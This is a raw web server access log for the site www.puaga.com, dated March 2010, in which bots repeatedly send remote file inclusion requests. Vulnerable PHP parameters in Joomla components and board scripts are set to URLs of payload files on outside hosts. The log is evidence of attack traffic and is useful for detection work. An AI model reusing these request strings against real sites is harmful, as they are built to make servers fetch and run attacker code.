116.127.121.117 - - [03/Mar/2010:06:43:43 -0800] "GET /logs/access_100203.log%20%20///bbs//com.br/images/img.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:43:43 -0800] "GET //bbs//com.br/images/img.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:43:43 -0800] "GET /logs///bbs//com.br/images/img.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:43:43 -0800] "GET /logs/access_100210.log%20%20///bbs//com.br/images/img.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:06:43:51 -0800] "GET /logs/access_100222.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:06:43:52 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
212.241.177.123 - - [03/Mar/2010:06:43:52 -0800] "GET /kboard.php?board=free&act=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [03/Mar/2010:06:43:53 -0800] "GET /logs//kboard.php?board=free&act=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [03/Mar/2010:06:43:53 -0800] "GET /logs/access_100214.log%20%20//kboard.php?board=free&act=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:06:43:53 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
219.150.205.156 - - [03/Mar/2010:06:44:10 -0800] "GET /logs/access_100126.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.puaga.com"
219.150.205.156 - - [03/Mar/2010:06:44:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.puaga.com"
219.150.205.155 - - [03/Mar/2010:06:44:12 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.puaga.com"
219.150.205.155 - - [03/Mar/2010:06:44:38 -0800] "GET /logs/access_100126.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.puaga.com"
219.150.205.156 - - [03/Mar/2010:06:44:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.puaga.com"
219.150.205.156 - - [03/Mar/2010:06:44:39 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.puaga.com"
212.241.177.123 - - [03/Mar/2010:06:47:20 -0800] "GET /logs/access_100226.log//kboard.php?board=free&act=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [03/Mar/2010:06:47:33 -0800] "GET /logs/access_100202.log/?_SERVER%5BDOCUMENT_ROOT%5D=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [03/Mar/2010:06:47:33 -0800] "GET /logs/?_SERVER%5BDOCUMENT_ROOT%5D=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [03/Mar/2010:06:47:33 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:49:03 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:49:03 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:49:04 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:50:15 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:50:15 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:50:15 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:06:50:32 -0800] "GET /logs/index.php?pageurl=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:06:50:32 -0800] "GET /index.php?pageurl=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:06:50:32 -0800] "GET /logs/access_100208.log/index.php?pageurl=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:51:22 -0800] "GET /logs/access_100213.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:51:30 -0800] "GET /logs/access_100205.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [03/Mar/2010:06:51:54 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [03/Mar/2010:06:51:54 -0800] "GET /logs/access_100203.log//include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [03/Mar/2010:06:51:54 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:06:51:59 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:06:51:59 -0800] "GET /logs/access_100203.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:06:51:59 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:53:02 -0800] "GET /logs/access_100213.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:53:06 -0800] "GET /logs/access_100205.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:53:16 -0800] "GET //bbs//com.br/images/root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:53:16 -0800] "GET /logs///bbs//com.br/images/root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:53:16 -0800] "GET /logs/access_100203.log%20%20///bbs//com.br/images/root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:53:16 -0800] "GET /logs/access_100210.log%20%20///bbs//com.br/images/root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:06:53:24 -0800] "GET /logs/access_100203.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:06:53:53 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:06:53:53 -0800] "GET /logs/access_100203.log//include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:06:53:53 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [03/Mar/2010:06:53:54 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [03/Mar/2010:06:53:54 -0800] "GET /logs/access_100203.log//include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [03/Mar/2010:06:53:54 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:06:53:55 -0800] "GET /logs/access_100210.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [03/Mar/2010:06:54:02 -0800] "GET /logs/access_100210.log//include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [03/Mar/2010:06:54:04 -0800] "GET /logs/access_100210.log//include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:54:22 -0800] "GET //bbs//com.br/images/root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:54:22 -0800] "GET /logs/access_100203.log%20%20///bbs//com.br/images/root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:54:22 -0800] "GET /logs///bbs//com.br/images/root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:54:22 -0800] "GET /logs/access_100210.log%20%20///bbs//com.br/images/root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:06:55:34 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:06:55:34 -0800] "GET /logs/access_100203.log//include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:06:55:34 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:06:55:43 -0800] "GET /logs/access_100210.log//include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:56:14 -0800] "GET /logs/access_100207.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:56:14 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:56:15 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:06:56:21 -0800] "GET /logs/access_100210.log//include/print_category.php?setup[use_category]=1&dir=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:56:39 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:56:44 -0800] "GET /logs/access_100207.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:56:44 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:56:54 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:56:55 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:56:55 -0800] "GET /logs/access_100207.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:56:55 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:57:16 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [03/Mar/2010:06:57:20 -0800] "GET /logs/access_100219.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geba.de/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [03/Mar/2010:06:57:20 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geba.de/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [03/Mar/2010:06:57:20 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.geba.de/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [03/Mar/2010:06:57:22 -0800] "GET /logs/access_100226.log%20%20//kboard.php?board=free&act=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:57:25 -0800] "GET /logs/access_100207.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:57:25 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:57:25 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:57:43 -0800] "GET /logs/access_100213.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:01:38 -0800] "GET /nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:01:38 -0800] "GET /logs//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:01:38 -0800] "GET /logs/access_100206.log%20%20//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:07:02:44 -0800] "GET /logs///bbs//com.br/images/root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:07:02:44 -0800] "GET //bbs//com.br/images/root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:07:02:44 -0800] "GET /logs/access_100203.log%20%20///bbs//com.br/images/root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:07:02:44 -0800] "GET /logs/access_100210.log%20%20///bbs//com.br/images/root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:07:03:06 -0800] "GET //bbs//com.br/images/root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:07:03:06 -0800] "GET /logs/access_100203.log%20%20///bbs//com.br/images/root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:07:03:06 -0800] "GET /logs/access_100210.log%20%20///bbs//com.br/images/root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:07:03:06 -0800] "GET /logs///bbs//com.br/images/root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:05:16 -0800] "GET /logs/access_100220.log%20%20//index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:05:17 -0800] "GET /index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:05:21 -0800] "GET /logs//index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:05:28 -0800] "GET /logs//index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:05:28 -0800] "GET /index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:05:32 -0800] "GET /logs/access_100220.log//index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:05:32 -0800] "GET /logs/access_100220.log%20%20//index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:05:32 -0800] "GET /logs//index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:05:53 -0800] "GET /logs//index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:05:53 -0800] "GET /logs/access_100220.log%20%20//index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:05:54 -0800] "GET /index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:06:09 -0800] "GET /logs/access_100220.log%20%20//index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:06:11 -0800] "GET /logs//index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:06:12 -0800] "GET /index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:06:54 -0800] "GET /index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:07:06:58 -0800] "GET /nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:07:06:58 -0800] "GET /logs/access_100202.log%20%20//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:07:06:58 -0800] "GET /logs//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:06:59 -0800] "GET /index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:07:02 -0800] "GET /index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:07:05 -0800] "GET /index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:07:27 -0800] "GET /logs//index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
